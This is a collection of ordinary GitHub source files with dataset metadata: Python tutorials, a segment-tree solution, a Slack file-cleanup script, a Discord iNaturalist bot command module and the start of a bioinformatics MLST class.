test2():\n\tin_str = \"Today, 10.000.999,22 nguoi chet vi covid-19 , du da chich vac xin 8.000,3 lieu\"\n\tf = NumberLocalization(Locale.Norwegian, Locale.US)\n\tout_str = f.convert(in_str)\n\tprint(in_str)\n\tprint(out_str)\n\ndef main():\n\tresult = \"\"\n\tf = open(\"raw_input.txt\")\n\t\n\tgrammarly = MiniGrammarly()\n\tfor line in f:\n\t\tresult += grammarly.check(line)\n\t\t# print(doc_format.format(line))\n\n\tprint(result)\n\n\t# Write to file\n\tfw = open(\"formatted_input.txt\", \"w\")\n\tfw.write(result)\n\tfw.close()\n\t\nif __name__ == \"__main__\":\n\tmain()\n\t# test()\n\t# test2()\n\t# testStringBuilder()\n","repo_name":"NLTN/wordpress-txt2wxr","sub_path":"MiniGrammarly.py","file_name":"MiniGrammarly.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41931274661","text":"from setuptools import setup, find_packages\n\nconfig = {\n 'description': \"A suite of tools for portable automated scientific protocols.\",\n 'author': \"OpenTrons\",\n 'author_email': 'info@opentrons.com',\n 'url': 'http://opentrons.com',\n 'version': '1.0',\n 'install_requires': ['pyyaml', 'pyserial'],\n 'packages': find_packages(exclude=[\"tests\"]),\n 'package_data': {\n \"opentrons_sdk\": [\n \"config/containers/**/*.yml\",\n \"config/containers/legacy_containers.json\",\n \"compilers/data/*\",\n \"compilers/templates/*\"\n ]\n },\n 'scripts': [\n 'bin/opentrons_sdk-compile'\n ],\n 'name': 'opentrons_sdk',\n 'test_suite': 'nose.collector',\n 'zip_safe': 
False\n}\n\nsetup(**config)\n","repo_name":"Yuffster/opentrons_sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"20029326937","text":"'''\nTuple\nTuples are used to store multiple items in a single variable.\n\nTuple is one of 4 built-in data types in Python used to store collections of data, the other 3 are List, \nSet, and Dictionary, all with different qualities and usage.\n\nA tuple is a collection which is ordered and unchangeable.\n\nTuples are written with round brackets.\n'''\n\n# Create a Tuple:\nthistuple = (\"apple\", \"banana\", \"cherry\")\nprint(thistuple)\n\n# Tuples allow duplicate values:\nthistuple = (\"apple\", \"banana\", \"cherry\", \"apple\", \"cherry\")\nprint(thistuple)\n\n# Print the number of items in the tuple:\nthistuple = (\"apple\", \"banana\", \"cherry\")\nprint(len(thistuple))\n\n# One item tuple, remember the comma:\nthistuple = (\"apple\",)\nprint(type(thistuple))\n\n# NOT a tuple\nthistuple = (\"apple\")\nprint(type(thistuple))\n\n# String, int and boolean data types:\ntuple1 = (\"apple\", \"banana\", \"cherry\")\ntuple2 = (1, 5, 7, 9, 3)\ntuple3 = (True, False, False)\n\n# A tuple with strings, integers and boolean values:\ntuple1 = (\"abc\", 34, True, 40, \"male\")\nprint(type(tuple1))\n\n# What is the data type of a tuple?\nmytuple = (\"apple\", \"banana\", \"cherry\")\nprint(type(mytuple))\n\n# Using the tuple() method to make a tuple:\nthistuple = tuple((\"apple\", \"banana\", \"cherry\")) # note the double round-brackets\nprint(thistuple)","repo_name":"bogaraviteja/python-basics","sub_path":"python/03_data_structures/02_tuples/01_tuples.py","file_name":"01_tuples.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4298314545","text":"# RESIZING WINDOWS\nimport cv2\n\ncv2.namedWindow(\"klon\") # lets us resize the window with the mouse\n\nimg = cv2.imread(\"klon.jpg\")\n\nimg = cv2.resize(img,(640,480)) # here we can resize more precisely, to exactly the dimensions we want\n\n\ncv2.imshow(\"klon\",img)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n","repo_name":"Yusufygc/GoruntuIsleme","sub_path":"klasor6/calısma2.py","file_name":"calısma2.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13097694595","text":"from sys import stdin, setrecursionlimit\n\nsetrecursionlimit(100_100)\n\n\ndef solution(N, vals, queries):\n    LEAF_SIZE = 2**len(bin(N-1)[2:])\n    tree = [None]*2*LEAF_SIZE\n\n    def fill_tree(left, right, tid):\n        if left == right:\n            if left <= N:\n                tree[tid] = left\n            return tree[tid]\n        m = (left + right)//2\n        idxs = (fill_tree(left, m, tid * 2), fill_tree(m + 1, right, tid * 2 + 1))\n        tree[tid] = sorted(idxs, key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n        return tree[tid]\n    fill_tree(1, LEAF_SIZE, 1)\n\n    def update_tree(left, right, tid, idx):\n        if left == right:\n            return tree[tid]\n\n        m = (left + right)//2\n        if idx <= m:\n            a = update_tree(left, m, tid*2, idx)\n            b = tree[tid*2+1]\n        else:\n            a = tree[tid*2]\n            b = update_tree(m+1, right, tid*2+1, idx)\n        tree[tid] = sorted((a, b), key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n        return tree[tid]\n\n    def query_min(left, right, start, end, tid):\n        if start <= left and right <= end:\n            return tree[tid]\n        if end < left or right < start:\n            return None\n        m = (left + right)//2\n        idxs = query_min(left, m, start, end, tid * 2), query_min(m + 1, right, start, end, tid * 2 + 1)\n        return sorted(idxs, key=lambda x: vals[x-1] if x is not None else float('inf'))[0]\n\n    answers = []\n    for op, a, b in queries:\n        if op == 1:\n            vals[a-1] = b\n            update_tree(1, LEAF_SIZE, 1, a)\n        elif op == 2:\n            answers.append(query_min(1, LEAF_SIZE, a, b, 1))\n    return answers\n\n\nlexer = lambda: [int(c) for c in stdin.readline().strip().split(' ')]\nN = int(stdin.readline())\nvals = lexer()\nM = int(stdin.readline())\nqueries = [lexer() for _ in range(M)]\n\nfor a in solution(N, vals, queries):\n    print(a)\n","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/세그먼트 트리/14428 수열과 쿼리 16.py","file_name":"14428 수열과 쿼리 16.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37882951091","text":"\"\"\" Access Specifiers\nSpecify the access level of an attribute/method.\nPublic, Protected, Private.\n\"\"\"\n# Protected members are accessible in the same class and all of its child-classes;\n# use underscore (_) as a prefix.\n\nclass Vehicle:\n\n    def __init__(self, engine):\n        # protected members\n        self._engine = engine\n\nclass Car(Vehicle):\n    def __init__(self, engine, model, price):\n        super().__init__(engine)\n        # protected members\n        self._model = model\n        self._price = price\n\n    def print_info(self):\n        # protected member is accessible in child class\n        print(f\"Engine: {self._engine} \")\n        print(f\"Model : {self._model} \")\n        print(f\"Price : {self._price} L\")\n\n\npar_obj = Vehicle('Diesel')\nobj = Car('electric', 'Nexon', 15)\n\nobj.print_info()\n","repo_name":"Nimesh-Nagar/iot","sub_path":"2.programming_technology/Python_Programming/Practice/oops/p12_protected.py","file_name":"p12_protected.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39966721927","text":"# Inspired by https://github.com/kfei/slack-cleaner\n\nimport datetime\nimport re\nimport sys\nimport time\nfrom slacker import Slacker\n\ndef prev_ts(days):\n    date = datetime.datetime.today()\n    delta = datetime.timedelta(days=days)\n    return (date - delta).timestamp()\n\ndef remove_files(slack, ts, types):\n    # Deletes everything up to the provided ts\n    page = 1\n    has_more = True\n    counter = 0\n    while has_more:\n        res = slack.files.list(ts_to=ts, types=types).body\n\n        if not res['ok']:\n            print('SLACK MAD')\n            sys.exit(1)\n\n        files = res['files']\n        current_page = res['paging']['page']\n        total_pages = res['paging']['pages']\n        has_more = current_page < total_pages\n        page = current_page + 1\n\n        for f in files:\n            # Delete user file\n            counter += delete_file(slack, f)\n    return counter\n\ndef delete_file(slack, f):\n    # Actually perform the task\n    try:\n        # No response is a good response\n        slack.files.delete(f['id'])\n        return 1\n    except Exception as error:\n        print(\"Can't delete \", f['id'])\n        return 0\n\ndef main():\n    # Usage: python main.py token days types\n    # Example: python main.py xoxojfiwjfoiwejfejwio 30 all\n    # Get token at https://api.slack.com/custom-integrations/legacy-tokens\n    # Everything up to x days ago will be deleted\n    [_, token, days, types] = sys.argv\n    api = Slacker(token)\n    deleted = remove_files(api, prev_ts(int(days)), types)\n    return \"Deleted \" + str(deleted) + \" 
files\"\n\nprint(main())\n","repo_name":"AHAAAAAAA/slacko-deleto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31018907769","text":"\"\"\"Module for obs command group.\"\"\"\r\nimport logging\r\nimport re\r\nfrom collections import namedtuple\r\nfrom contextlib import asynccontextmanager\r\nfrom typing import Optional, Union\r\nimport urllib.parse\r\n\r\nfrom dronefly.core.constants import RANK_KEYWORDS, RANK_LEVELS\r\nfrom dronefly.core.formatters.constants import WWW_BASE_URL\r\nfrom dronefly.core.formatters.generic import LifeListFormatter\r\nfrom dronefly.core.parsers.url import PAT_OBS_LINK, PAT_TAXON_LINK\r\nfrom dronefly.core.query.query import Query\r\nfrom dronefly.core.utils import obs_url_from_v1\r\nfrom dronefly.discord.embeds import make_embed\r\nfrom pyinaturalist.models import Observation\r\nfrom redbot.core import checks, commands\r\nfrom redbot.core.commands import BadArgument\r\nfrom redbot.core.utils.menus import menu, DEFAULT_CONTROLS\r\n\r\nfrom ..common import grouper\r\nfrom ..converters.base import NaturalQueryConverter\r\nfrom ..converters.reply import EmptyArgument, TaxonReplyConverter\r\nfrom ..embeds.common import apologize, add_reactions_with_cancel\r\nfrom ..embeds.inat import INatEmbed, INatEmbeds\r\nfrom ..menus.inat import BaseMenu, LifeListSource\r\nfrom ..interfaces import MixinMeta\r\nfrom ..obs import get_formatted_user_counts, maybe_match_obs\r\nfrom ..taxa import TAXON_COUNTS_HEADER\r\nfrom ..utils import get_home, use_client\r\n\r\nObsResult = namedtuple(\"Singleobs\", \"obs url preview\")\r\nlogger = logging.getLogger(\"red.dronefly.\" + __name__)\r\n\r\n\r\nclass CommandsObs(INatEmbeds, MixinMeta):\r\n \"\"\"Mixin providing obs command group.\"\"\"\r\n\r\n @asynccontextmanager\r\n async def _single_obs(self, ctx, query):\r\n \"\"\"Return a single observation, its URL, and whether to preview it.\r\n\r\n Image preview is only desired if it wasn't already auto-previewed\r\n by Discord itself (i.e. the user pasted a URL, and did not use a\r\n slash-command).\r\n \"\"\"\r\n if query:\r\n id_or_link = None\r\n if query.isnumeric():\r\n id_or_link = query\r\n else:\r\n mat = re.search(PAT_OBS_LINK, query)\r\n if mat and mat[\"url\"]:\r\n id_or_link = query\r\n if id_or_link:\r\n obs, url = await maybe_match_obs(\r\n self, ctx, id_or_link, id_permitted=True\r\n )\r\n # Note: if the user specified an invalid or deleted id, a url is still\r\n # produced (i.e. should 404).\r\n if url:\r\n yield ObsResult(obs, url, ctx.interaction is not None)\r\n return\r\n else:\r\n await apologize(ctx, \"I don't understand\")\r\n yield\r\n return\r\n\r\n try:\r\n ref = ctx.message.reference\r\n if ref:\r\n # It's a reply. 
Try to get an observation from the message.\r\n # TODO: Lifted from TaxonReplyConverter; don't know where this belongs yet.\r\n msg = ref.cached_message\r\n if not msg:\r\n if (\r\n ctx.guild\r\n and not ctx.channel.permissions_for(\r\n ctx.guild.me\r\n ).read_message_history\r\n ):\r\n raise LookupError(\r\n \"I need Read Message History permission to read that message.\"\r\n )\r\n msg = await ctx.channel.fetch_message(ref.message_id)\r\n if msg and msg.embeds:\r\n inat_embed = INatEmbed.from_discord_embed(msg.embeds[0])\r\n # pylint: disable=no-member, assigning-non-slot\r\n # - See https://github.com/PyCQA/pylint/issues/981\r\n # Replying to observation display:\r\n if inat_embed.obs_url:\r\n mat = re.search(PAT_OBS_LINK, inat_embed.obs_url)\r\n # Try to get single observation for the display:\r\n if mat and mat[\"url\"]:\r\n obs, url = await maybe_match_obs(\r\n self, ctx, inat_embed.obs_url, id_permitted=False\r\n )\r\n # If there is no query and we found a url, just yield\r\n # the obs result for the matched obs without a\r\n # preview (i.e. it has been seen already so don't\r\n # show it again - typically useful for showing updated\r\n # details like community ID).\r\n if url and not query:\r\n yield ObsResult(obs, url, False)\r\n return\r\n # Otherwise try to get other usable info from reply\r\n # to make a new observation query.\r\n _query = await TaxonReplyConverter.convert(ctx, query)\r\n obs = await self.obs_query.query_single_obs(ctx, _query)\r\n except EmptyArgument:\r\n await ctx.send_help()\r\n yield\r\n return\r\n except (BadArgument, LookupError) as err:\r\n await apologize(ctx, str(err))\r\n yield\r\n return\r\n\r\n url = f\"{WWW_BASE_URL}/observations/{obs.id}\"\r\n yield ObsResult(obs, url, True)\r\n\r\n @commands.hybrid_group(aliases=[\"observation\"], fallback=\"show\")\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def obs(self, ctx, *, query: Optional[str] = \"\"):\r\n \"\"\"Observation matching query, link, or number.\r\n\r\n - See `[p]query` and `[p]taxon_query` for help with *query* terms.\r\n - Use `[p]search obs` to find more than one observation.\r\n - Normally just pasting a *link* will suffice in a channel where *autoobs* is on. 
See `[p]autoobs` for details.\r\n        \"\"\" # noqa: E501\r\n        async with self._single_obs(ctx, query) as res:\r\n            if res:\r\n                embed = await self.make_obs_embed(\r\n                    ctx, res.obs, res.url, preview=res.preview\r\n                )\r\n                await self.send_obs_embed(ctx, embed, res.obs)\r\n\r\n    @obs.command(name=\"count\")\r\n    async def obs_count(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n        \"\"\"Count matching observations.\"\"\"\r\n        await (self.bot.get_command(\"tabulate\")(ctx, query=query))\r\n\r\n    @obs.command(name=\"life\")\r\n    async def obs_life(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n        \"\"\"Life list with observation totals.\"\"\"\r\n        await (self.bot.get_command(\"life\")(ctx, query=query))\r\n\r\n    @obs.command(name=\"map\")\r\n    async def obs_map(self, ctx, *, query: NaturalQueryConverter):\r\n        \"\"\"Show map of observations.\"\"\"\r\n        await (self.bot.get_command(\"map obs\")(ctx, query=query))\r\n\r\n    @obs.command(name=\"maverick\")\r\n    async def obs_maverick(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n        \"\"\"Count maverick observations.\"\"\"\r\n        await (self.bot.get_command(\"tabulate maverick\")(ctx, query=query))\r\n\r\n    @obs.command(name=\"search\")\r\n    async def obs_search(self, ctx, *, query: Optional[TaxonReplyConverter] = None):\r\n        \"\"\"Search for matching observations.\"\"\"\r\n        await (self.bot.get_command(\"search obs\")(ctx, query=query))\r\n\r\n    @obs.command(name=\"img\", aliases=[\"image\", \"photo\"])\r\n    @checks.bot_has_permissions(embed_links=True)\r\n    @use_client\r\n    async def obs_img(self, ctx, number: Optional[int], *, query: Optional[str] = \"\"):\r\n        \"\"\"Image for observation.\r\n\r\n        - Shows the image indicated by `number`, or if number is omitted, the first image.\r\n        - Command may be a *Reply* to an observation display instead of a query.\r\n        - See `[p]query` and `[p]taxon_query` for help with *query* terms.\r\n        \"\"\" # noqa: E501\r\n        async with self._single_obs(ctx, query) as res:\r\n            if res:\r\n                embed = await self.make_obs_embed(\r\n                    ctx, res.obs, res.url, preview=number or 1\r\n                )\r\n                await self.send_obs_embed(ctx, embed, res.obs)\r\n\r\n    @commands.hybrid_group(fallback=\"help\")\r\n    @checks.bot_has_permissions(embed_links=True)\r\n    async def top(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n        \"\"\"Leaderboards for observations, species, identifications, etc.\"\"\"\r\n        await ctx.send_help()\r\n\r\n    @top.command(name=\"identifiers\", aliases=[\"id\", \"ids\"])\r\n    @use_client\r\n    async def top_identifiers(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n        \"\"\"Top observations IDed per IDer (alias `[p]topids`).\"\"\"\r\n        await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n    @top.command(name=\"observers\", aliases=[\"obs\"])\r\n    @use_client\r\n    async def top_observers(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n        \"\"\"Top observations per observer (alias `[p]topobs`).\"\"\"\r\n        await self._tabulate_query(ctx, query)\r\n\r\n    @top.command(name=\"species\", aliases=[\"spp\", \"sp\"])\r\n    @use_client\r\n    async def top_species(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n        \"\"\"Top species per observer (alias `[p]topspp`).\"\"\"\r\n        await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n    @commands.group(invoke_without_command=True)\r\n    @checks.bot_has_permissions(embed_links=True)\r\n    @use_client\r\n    async def life(self, ctx, *, query: Optional[Union[TaxonReplyConverter, str]]):\r\n        \"\"\"Life list with observation totals.\r\n\r\n        • If the life list is for one user, the title 
links to it.\r\n        • Buttons to change `per` details and taxon root:\r\n          • :leaves: toggles alphabetical list of leaf taxa.\r\n          • :arrow_up_down: changes rank detail level: main (default), any, or selected taxon.\r\n          • :top: toggles selected taxon as the tree root.\r\n        • Buttons to change taxon row details:\r\n          • :regional_indicator_d: toggles direct taxon count.\r\n          • :regional_indicator_c: toggles common names (user life list only).\r\n        • Specify `per any` for maximum detail or `per <rank>` to show taxa of just this rank.\r\n        • See `[p]query` and `[p]taxon_query` for help with *query* terms, or `[p]glossary` for an explanation of *leaf taxa*.\r\n\r\n        e.g.\r\n        ```\r\n        [p]life my\r\n        -> Your whole life list\r\n        [p]life my beetles\r\n        -> Your beetles\r\n        [p]life my bees per any\r\n        -> Your bees at any rank detail\r\n        [p]life bees from nova scotia\r\n        -> Bees from this place\r\n        [p]life beetles by syntheticbee\r\n        -> This user's beetles\r\n        ```\r\n        \"\"\" # noqa: E501\r\n        error_msg = None\r\n        msg = None\r\n        async with ctx.typing():\r\n            try:\r\n                if isinstance(query, Query):\r\n                    _query = query\r\n                else:\r\n                    _query = await TaxonReplyConverter.convert(\r\n                        ctx, query, allow_empty=True\r\n                    )\r\n                query_response = await self.query.get(ctx, _query)\r\n                per_rank = _query.per or \"main\"\r\n                if per_rank not in [*RANK_KEYWORDS, \"leaf\", \"main\", \"any\"]:\r\n                    raise BadArgument(\r\n                        f\"Specify `per <rank>`. \"\r\n                        f\"See `{ctx.clean_prefix}help life` for details.\"\r\n                    )\r\n                life_list = await ctx.inat_client.observations.life_list(\r\n                    **query_response.obs_args()\r\n                )\r\n                if not life_list:\r\n                    raise LookupError(\r\n                        f\"No life list {query_response.obs_query_description()}\"\r\n                    )\r\n                per_page = 10\r\n                life_list_formatter = LifeListFormatter(\r\n                    life_list,\r\n                    per_rank,\r\n                    query_response,\r\n                    with_taxa=True,\r\n                    per_page=per_page,\r\n                )\r\n                await BaseMenu(\r\n                    source=LifeListSource(life_list_formatter),\r\n                    delete_message_after=False,\r\n                    clear_reactions_after=True,\r\n                    timeout=60,\r\n                    cog=self,\r\n                    page_start=0,\r\n                ).start(ctx=ctx)\r\n            except (BadArgument, LookupError) as err:\r\n                error_msg = str(err)\r\n        if error_msg:\r\n            await apologize(ctx, error_msg)\r\n        else:\r\n            if msg:\r\n                await add_reactions_with_cancel(ctx, msg, [])\r\n\r\n    @commands.group(invoke_without_command=True, aliases=[\"tab\"])\r\n    @checks.bot_has_permissions(embed_links=True)\r\n    @use_client\r\n    async def tabulate(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n        \"\"\"Tabulate iNaturalist data.\r\n\r\n        • Only observations can be tabulated. More kinds of table to be supported in future releases.\r\n        • The *per row* can be: `from`, `id by`, `not by`, or `by`, and breaks down the count of observations in the table topic into per name (of place or user) in the table.\r\n        • When more than one eligible filter is given, the first in order in the list above is the table topic, and the second in order above is the *per row* count.\r\n        • All remaining filters beyond those, including any that can't be used as *per row* values, e.g. `in prj`, `rg`, etc. 
are applied to the table topic.\r\n e.g.\r\n ```\r\n [p]tab fish from home\r\n -> per place (home listed; others react to add)\r\n [p]tab fish by me\r\n -> per user (self listed; others react to add)\r\n [p]tab fish not by me\r\n -> per unobserved by (self listed; others react to add)\r\n [p]tab fish id by me\r\n -> per identified by (self listed; others react to add)\r\n [p]tab fish from canada by me\r\n -> per user (self listed; others react to add) but only fish from canada are tabulated\r\n ```\r\n \"\"\" # noqa: E501\r\n error_msg = None\r\n msg = None\r\n async with ctx.typing():\r\n _query = query or await TaxonReplyConverter.convert(ctx, \"\")\r\n try:\r\n query_response = await self.query.get(ctx, _query)\r\n msg = await ctx.send(\r\n embed=await self.make_obs_counts_embed(query_response)\r\n )\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n else:\r\n await self.add_obs_reaction_emojis(ctx, msg, query_response)\r\n\r\n @tabulate.command(name=\"maverick\")\r\n @use_client\r\n async def tabulate_maverick(self, ctx, *, query: Optional[str]):\r\n \"\"\"Maverick identifications.\r\n\r\n • By default, if your iNat login is known, your own maverick identifications are displayed.\r\n • The `by` qualifier can be used to display mavericks for another known user.\r\n \"\"\"\r\n error_msg = None\r\n async with ctx.typing():\r\n try:\r\n try:\r\n _query = await TaxonReplyConverter.convert(ctx, query)\r\n if not _query.user:\r\n _query.user = \"me\"\r\n except BadArgument:\r\n _query = await TaxonReplyConverter.convert(ctx, \"by me\")\r\n query_response = await self.query.get(ctx, _query)\r\n if not query_response.user:\r\n raise BadArgument(\"iNat user not found\")\r\n if _query and (\r\n _query.place\r\n or _query.controlled_term\r\n or _query.unobserved_by\r\n or _query.id_by\r\n or _query.per\r\n or _query.project\r\n ):\r\n raise BadArgument(\"I can't tabulate that yet\")\r\n embed = make_embed()\r\n embed.title = (\r\n f\"Maverick identifications {query_response.obs_query_description()}\"\r\n )\r\n ids_opt = {\"category\": \"maverick\", \"user_id\": query_response.user.id}\r\n if query_response.taxon:\r\n ids_opt[\"taxon_id\"] = query_response.taxon.id\r\n embed.url = f\"{WWW_BASE_URL}/identifications?\" + urllib.parse.urlencode(\r\n ids_opt\r\n )\r\n await ctx.send(embed=embed)\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n\r\n async def _tabulate_query(self, ctx, query, view=\"obs\"):\r\n def format_pages(user_links, users_count, entity_counted, view):\r\n pages = []\r\n pages_len = int((len(user_links) - 1) / 10) + 1\r\n for page, links in enumerate(grouper(user_links, 10), start=1):\r\n header = \"**{} top {}{}{}**\".format(\r\n \"First 500\" if users_count > 500 else users_count,\r\n entity_counted,\r\n \" by species\" if view == \"spp\" else \"\",\r\n f\" (page {page} of {pages_len})\" if pages_len > 1 else \"\",\r\n )\r\n page = \"\\n\".join([header, TAXON_COUNTS_HEADER, *filter(None, links)])\r\n pages.append(page)\r\n return pages\r\n\r\n embeds = []\r\n error_msg = None\r\n async with ctx.typing():\r\n _query = query or await TaxonReplyConverter.convert(ctx, \"\")\r\n try:\r\n query_response = await self.query.get(ctx, _query)\r\n obs_opt_view = \"identifiers\" if view == \"ids\" else \"observers\"\r\n obs_opt = query_response.obs_args()\r\n users = await self.api.get_observations(obs_opt_view, **obs_opt)\r\n # We 
count identifications when we tabulate identifiers, but link\r\n # to the observations tab on the web to show the observations\r\n # they identified, as there's no tidy way to link directly\r\n # to the identifications instead.\r\n if view == \"ids\":\r\n obs_opt_view = \"observations\"\r\n users_count = users.get(\"total_results\")\r\n if not users_count:\r\n raise LookupError(\r\n f\"No observations found {query_response.obs_query_description()}\"\r\n )\r\n obs_opt[\"view\"] = obs_opt_view\r\n url = obs_url_from_v1(obs_opt)\r\n taxon = query_response.taxon\r\n species_only = (\r\n taxon and RANK_LEVELS[taxon.rank] <= RANK_LEVELS[\"species\"]\r\n )\r\n user_links = get_formatted_user_counts(users, url, species_only, view)\r\n query_description = query_response.obs_query_description()\r\n if view == \"ids\":\r\n entity_counted = \"identifiers\"\r\n else:\r\n entity_counted = obs_opt_view\r\n full_title = f\"{entity_counted.capitalize()} {query_description}\"\r\n pages = format_pages(user_links, users_count, entity_counted, view)\r\n\r\n summary_counts = await self.summarize_obs_spp_counts(taxon, obs_opt)\r\n embeds = [\r\n make_embed(\r\n title=full_title,\r\n url=url,\r\n description=f\"{summary_counts}\\n{page}\",\r\n )\r\n for page in pages\r\n ]\r\n except (BadArgument, LookupError) as err:\r\n error_msg = str(err)\r\n\r\n if error_msg:\r\n await apologize(ctx, error_msg)\r\n elif len(embeds) > 1:\r\n await menu(ctx, embeds, DEFAULT_CONTROLS)\r\n else:\r\n await ctx.send(embed=embeds[0])\r\n\r\n @tabulate.command(name=\"topids\")\r\n @use_client\r\n async def tabulate_top_identifiers(\r\n self, ctx, *, query: Optional[TaxonReplyConverter]\r\n ):\r\n \"\"\"Top observations IDed per IDer (alias `[p]topids`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n @commands.command(name=\"topids\", hidden=True)\r\n @use_client\r\n async def top_identifiers_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations IDed per IDer (alias `[p]tab topids`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"ids\")\r\n\r\n @tabulate.command(name=\"topobs\")\r\n @use_client\r\n async def tabulate_top_observers(\r\n self, ctx, *, query: Optional[TaxonReplyConverter]\r\n ):\r\n \"\"\"Top observations per observer (alias `[p]topobs`).\"\"\"\r\n await self._tabulate_query(ctx, query)\r\n\r\n @commands.command(name=\"topobs\", hidden=True)\r\n @use_client\r\n async def top_observers_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top observations per observer (alias `[p]tab topobs`).\"\"\"\r\n await self._tabulate_query(ctx, query)\r\n\r\n @tabulate.command(name=\"topspp\", alias=[\"topsp\"])\r\n @use_client\r\n async def tabulate_top_species(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top species per observer (alias `[p]topspp`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n @commands.command(name=\"topspp\", alias=[\"topsp\"], hidden=True)\r\n @use_client\r\n async def top_species_alias(self, ctx, *, query: Optional[TaxonReplyConverter]):\r\n \"\"\"Top species per observer (alias `[p]tab topspp`).\"\"\"\r\n await self._tabulate_query(ctx, query, view=\"spp\")\r\n\r\n @commands.hybrid_command()\r\n @checks.bot_has_permissions(embed_links=True)\r\n @use_client\r\n async def link(self, ctx, *, query):\r\n \"\"\"Information and image from iNaturalist link.\r\n\r\n For observation displays, the default observation image is shown, if it has one.\r\n\r\n It is recommended when sending a URL to 
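The page assembly in format_pages above chunks user links ten to a page with a grouper helper; a self-contained sketch of that chunking, assuming grouper is the standard itertools recipe the cog imports.

from itertools import zip_longest

def grouper(iterable, n, fillvalue=None):
    # classic itertools recipe: pad the last chunk with fillvalue
    args = [iter(iterable)] * n
    return zip_longest(*args, fillvalue=fillvalue)

pages = [list(filter(None, chunk)) for chunk in grouper(range(1, 25), 10)]
assert len(pages) == 3 and pages[-1] == [21, 22, 23, 24]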
use the slash-command to avoid the message being previewed twice.\r\n\r\n If you're not sending as a slash-command, enclose the link in angle brackets to suppress the automatic Discord preview of the image to avoid the image being shown twice.\r\n\r\n e.g.\r\n ```\r\n [p]link \r\n ```\r\n\r\n See also `[p]help obs` and `[p]autoobs`.\r\n - Both of those methods for showing link info do not include the image, relying instead on the Discord to preview the link.\r\n - If channel permissions don't allow users to preview links, but do allow the bot to, or if you prefer the information on top, you may find this command preferable.\r\n \"\"\" # noqa: E501\r\n mat = re.search(PAT_OBS_LINK, query)\r\n if mat:\r\n obs_id = int(mat[\"obs_id\"])\r\n url = mat[\"url\"]\r\n\r\n home = await get_home(ctx)\r\n results = (\r\n await self.api.get_observations(\r\n obs_id, include_new_projects=1, preferred_place_id=home\r\n )\r\n )[\"results\"]\r\n obs = Observation.from_json(results[0]) if results else None\r\n embed = await self.make_obs_embed(ctx, obs, url)\r\n await self.send_obs_embed(ctx, embed, obs)\r\n return\r\n\r\n mat = re.search(PAT_TAXON_LINK, query)\r\n if mat:\r\n await (self.bot.get_command(\"taxon\")(ctx, query=mat[\"taxon_id\"]))\r\n return\r\n\r\n await apologize(ctx)\r\n","repo_name":"dronefly-garden/dronefly","sub_path":"inatcog/commands/obs.py","file_name":"obs.py","file_ext":"py","file_size_in_byte":23601,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"70819221924","text":"import logging\nimport os\nimport sys\nimport time\nfrom krocus.Fastas import Fastas\nfrom krocus.Fastq import Fastq\nfrom krocus.MlstProfile import MlstProfile\n\nclass Krocus:\n\tdef __init__(self,options):\n\t\tself.logger = logging.getLogger(__name__)\n\t\tself.allele_directory = options.allele_directory \n\t\tself.input_fastq = options.input_fastq\n\t\tself.kmer = options.kmer\n\t\tself.verbose = options.verbose\n\t\tself.min_fasta_hits = options.min_fasta_hits\n\t\tself.print_interval = options.print_interval\n\t\tself.output_file = options.output_file\n\t\tself.filtered_reads_file = options.filtered_reads_file\n\t\tself.target_st = options.target_st\n\t\tself.max_gap = options.max_gap\n\t\tself.min_block_size = options.min_block_size\n\t\tself.margin = options.margin\n\t\tself.start_time = int(time.time())\n\t\tself.divisible_by_3 = options.divisible_by_3\n\t\tself.min_kmers_for_onex_pass = options.min_kmers_for_onex_pass\n\t\tself.max_kmers = options.max_kmers\n\t\t\n\t\tif self.output_file and os.path.exists(self.output_file):\n\t\t\tself.logger.error(\"The output file already exists, please choose another filename: \"+ self.output_file)\n\t\t\tsys.exit(1)\n\t\t\t\n\t\tif self.filtered_reads_file and os.path.exists(self.filtered_reads_file):\n\t\t\tself.logger.error(\"The output filtered 